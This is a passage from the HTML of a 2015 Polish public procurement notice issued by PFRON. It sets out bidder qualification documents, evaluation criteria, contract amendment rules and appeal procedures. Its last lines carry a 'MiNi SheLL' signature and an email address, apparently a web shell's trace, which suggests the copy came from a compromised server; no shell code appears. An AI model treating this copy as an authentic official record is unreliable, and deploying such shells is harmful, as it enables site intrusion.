Wyżej wymienionych funkcji w zespole projektowo-badawczym nie można łączyć ze sobą.
W celu wykazania spełniania powyższego warunków udziału w postępowaniu, Wykonawca zobowiązany jest załączyć do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami nt. ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami potwierdzające spełnienie warunku opisanego w rozdziale VI pkt 2.3. SIWZ  (wg wzoru - Załącznik nr 6 do SIWZ).
l</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter zamówienia, Zamawiający nie wyznacza szczegółowego opisu sposobu dokonywania oceny spełniania powyższego warunku udziału postępowaniu. Zamawiający dokona oceny spełnienia ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego zgodnie z treścią Załącznika nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główne usługi uznaje się usługi niezbędne do wykazania spełniania warunku określonego w pkt 2.2 rozdziału VI SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące Załącznik nr 3 do SIWZ.
2. W sytuacji, gdy Wykonawca wykazując spełnianie warunków, o których mowa w pkt 2 rozdziału VI SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu 
do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia.
2.1.	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 2 rozdziału VI SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, to Wykonawca zobowiązany jest przedstawić w odniesieniu 
do tych podmiotów dokumenty wymienione w pkt 1.1 - pkt. 1.2 powyżej.
2.2.	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 2 rozdziału VI SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia dokumentów dotyczących:
- zakresu dostępnych Wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę przy wykonaniu zamówienia,
- charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia.
3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentu, o którym mowa w pkt 1.2 rozdziału VII SIWZ - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 3 powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego miejsce siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - ocena merytoryczna M - 60</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia  Umowy wymagają formy pisemnej pod rygorem nieważności.
2. Zmiany Umowy nie stanowi w szczególności zmiana nazw/określeń Stron, siedziby Stron, numerów rachunków bankowych Stron, jak również osób odpowiedzialnych za realizację Przedmiotu Umowy ze strony Wykonawcy oraz Zamawiającego.
3. Zamawiający dopuszcza możliwość zmiany niniejszej Umowy w następujących przypadkach:
3.1. wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy - w zakresie dostosowania postanowień Umowy do zmiany przepisów prawa;
3.2.	opóźnień w realizacji Umowy niezależnie od przyczyny - w zakresie zmian terminów realizacji Umowy, o ile zmiana taka jest korzystna dla Zamawiającego lub jest konieczna w celu prawidłowej realizacji Umowy.
4. Warunkiem dokonania zmian, o których mowa w ust. 3 jest złożenie wniosku przez stronę inicjującą zmianę zawierającego:
4.1 opis propozycji zmiany,
4.2 uzasadnienie zmiany,
4.3 opis wpływu zmiany na wykonanie umowy.
5. Zmiana Umowy dla swojej skuteczności wymaga formy pisemnej.
6. Zmiany Umowy, o których mowa w niniejszym paragrafie nie mogą w żadnym przypadku stanowić podstawy zwiększenia wysokości wynagrodzenia Wykonawcy, należnego na podstawie § 4 ust. 1 Umowy. Każda ze zmian, o których mowa 
w niniejszym paragrafie może jednak stanowić podstawę do obniżenia wysokości wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pfron.org.pl/bip/zamowienia-publiczne/ponizej-progu-okreslon<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych
al. Jana Pawła II 13, 00-828 Warszawa, pokój 802.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2015 godzina 12:00, miejsce: Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych
al. Jana Pawła II 13, 00-828 Warszawa
Kancelaria - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Informacja o formalnościach, jakie powinny zostać dopełnione po wyborze oferty w celu   zawarcia umowy w sprawie zamówienia publicznego.
Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany będzie przed zawarciem Umowy w sprawie zamówienia publicznego:
1. przedłożyć, w przypadku wyboru oferty Wykonawców występujących wspólnie, umowę regulującą ich współpracę (umowy konsorcjum) stwierdzającą solidarną odpowiedzialność wszystkich Wykonawców za realizację zamówienia oraz zawierającą upoważnienie dla jednego z nich do składania i przyjmowania oświadczeń wobec Zamawiającego w imieniu wszystkich Wykonawców, a także do otrzymywania należnych płatności;
2. przekazać wszystkie niezbędne informacje potrzebne do wypełnienia treści Umowy oraz wskazać osoby/osób uprawnione do zawarcia Umowy wraz z dokumentami uprawniającymi do zawarcia Umowy, o ile nie wynika to ze złożonych wraz z ofertą dokumentów;
3.  w przypadku wnoszenia zabezpieczenia należytego wykonania Umowy w formie gwarancji lub poręczenia, uzyskać przed zawarciem Umowy akceptację treści gwarancji lub poręczenia przez Zamawiającego.
II. Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku postępowania o udzielenie zamówienia.
1. Wykonawcy, a także innemu podmiotowi, jeżeli mają lub mieli interes w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy - Prawo zamówień publicznych, przysługują środki odwoławcze zgodnie z działem VI - środki ochrony prawnej ustawy. Wobec ogłoszenia oraz SIWZ środki ochrony prawnej przysługują również organizacjom wpisanym na listę, o której mowa w art. 154 pkt 5 ustawy. 
2. Odwołanie przysługuje wyłącznie wobec czynności:
2.1.	opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
2.2.	wykluczenia odwołującego z postępowania o udzielenie zamówienia,
2.3.	odrzucenia oferty odwołującego.
3. Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne uzasadniające wniesienie odwołania.
4. Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej w formie pisemnej albo elektronicznej opatrzonej bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu. 
5.	Terminy wniesienia odwołania:
5.1	odwołanie wnosi się w terminie: 5 dni od dnia przesłania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli zostały przesłane w sposób określony w art. 27 ust. 2 ustawy, albo 10 dni od dnia  jeżeli zostały przesłane w inny sposób,
5.2	odwołanie wobec treści ogłoszenia o zamówieniu oraz wobec postanowień SIWZ, wnosi się  w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej,
5.3	odwołanie wobec czynności innych niż określone w pkt 5.1 i 5.2 wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia. 
6.	W przypadku wniesienia odwołania wobec treści ogłoszenia o zamówieniu lub postanowień specyfikacji istotnych warunków zamówienia Zamawiający może przedłużyć termin składania ofert. 
7.	Wykonawca może w terminie przewidzianym do wniesienia odwołania poinformować Zamawiającego o niezgodnej z przepisami ustawy czynności podjętej przez niego lub zaniechaniu czynności, do której jest on zobowiązany na podstawie ustawy, na które nie przysługuje odwołanie na podstawie art. 180 ust. 2 ustawy. W przypadku uznania zasadności przekazanej informacji Zamawiający powtarza czynność lub dokonuje czynności zaniechanej, informując o tym Wykonawców w sposób przewidziany w ustawie dla tej czynności. 
8. Na czynności, o których mowa w pkt 7 powyżej, nie przysługuje odwołanie, 
z zastrzeżeniem art. 180 ust. 2 ustawy.
9. Na orzeczenie Izby Stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu. Skargę wnosi się do sądu okręgowego właściwego dla siedziby Zamawiającego. Skargę wnosi się za pośrednictwem Prezesa Izby w terminie 7 dni od dnia doręczenia orzeczenia Izby, przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce operatora pocztowego wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2012 r., poz. 1529) jest równoznaczne z jej wniesieniem. 
III. Informacja o sposobie porozumiewania się Zamawiającego z Wykonawcami. 
1. W niniejszym postępowaniu o udzielenie zamówienia oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem. Jeżeli Zamawiający lub Wykonawca przekazuje oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze Stron na żądanie drugiej potwierdzi fakt ich otrzymania.
2. W przypadku niepotwierdzenia przez Wykonawcę faktu otrzymania przekazanego przez Zamawiającego oświadczenia, wniosku, zawiadomienia oraz informacji, o których mowa w pkt 1 Zamawiający uzna, że dotarły on do Wykonawcy w dniu i godzinie jego nadania i były czytelne.
3. Zamawiający nie ponosi odpowiedzialności z tytułu nieotrzymania przez Wykonawcę informacji związanych z prowadzonym postępowaniem w przypadku wskazania przez Wykonawcę w ofercie błędnego adresu, numeru telefonu lub faksu.
4. Osoby uprawnione do kontaktu z Wykonawcami oraz numer faksu Zamawiającego:
4.1.	osobą uprawnioną do kontaktowania się z Wykonawcami jest pracownik Sekcji Zamówień Publicznych: Monika Bartold, numer telefonu: (+48) 22 50 55 256;
4.2.	numer faksu: (+48) 22 50 55 275.
IV. Wykonawca zobowiązany będzie do wniesienia zabezpieczenia należytego wykonania Umowy najpóźniej przed wyznaczonym przez Zamawiającego terminem podpisania Umowy.Wartość zabezpieczenia wyniesie 10% ceny całkowitej brutto podanej w ofercie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com